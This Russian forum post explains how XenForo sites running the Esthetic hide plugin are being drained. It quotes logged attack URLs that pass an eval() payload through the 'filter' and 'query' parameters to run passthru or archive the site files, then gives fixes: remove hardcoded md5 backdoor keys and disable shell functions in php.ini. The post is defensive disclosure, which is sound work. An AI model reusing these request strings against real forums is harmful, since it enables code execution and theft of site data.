Вообще здесь об этом говорилось http://xenforotest.ru/threads/hide-...e-mnogofunkcionalnyj-i-ochen-udobnyj-xajd.14/
И ещё вот инфа попалась по этому поводу:
Форум сливается примерно такими запросами:
Код:
passthru() has been disabled for security reasons
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
Содержимое запроса
array(3) {
["url"] => string(264) "http://вас сайт/бла/бла/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27tar%20-cvvzf%20foo.tar.gz%20./library%27));"
["_GET"] => array(2) {
["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
["query"] => string(49) "die(passthru('tar -cvvzf foo.tar.gz ./library'));"
}
["_POST"] => array(0) {
}
}
Код:
RecursiveDirectoryIterator::__construct(./cgi): failed to open dir: Permission denied
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
Содержимое запроса
array(3) {
["url"] => string(601) "http://ваш сайт/threads/тут ссылка на складчину/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=$zip=new%20ZipArchive;$zip-%3Eopen(%27backup.zip%27,ZipArchive::CREATE);$files=new%20RecursiveIteratorIterator(new%20RecursiveDirectoryIterator(%27./%27),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files%20as%20$name=%3E$file){$filePath%20=%20$file-%3EgetRealPath();$zip-%3EaddFile($filePath);}$zip-%3Eclose();"
["_GET"] => array(2) {
["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
["query"] => string(283) "$zip=new ZipArchive;$zip->open('backups.rar',ZipArchive::CREATE);$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator('./'),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files as $name=>$file){$filePath = $file->getRealPath();$zip->addFile($filePath);}$zip->close();"
}
["_POST"] => array(0) {
}
}
Теперь перейдем к лечению дырок на примере плагина хайда от esthetic
Открываем файл:
library/Esthetic/EBBC/ControllerPublic/Thread.php
Находим:
Код:
case '54626eee0bcb90ab43c7917eb49f2344'
и удаляем вторую строку
Код:
case 'a6746afee9fa4e6e4901943d47f272bf''
либо генерируем свой md5 код и вставлем вместо этих двух.
Остальное плагины латаются по аналогии.
Потом идем в файл php.ini который находится на вашем сервере,либо хостинге и ищем
строчку
disable_functions и заменяем на:
disable_functions="popen,exec,system,passthru,proc_open,shell_exec
Информация отсюда: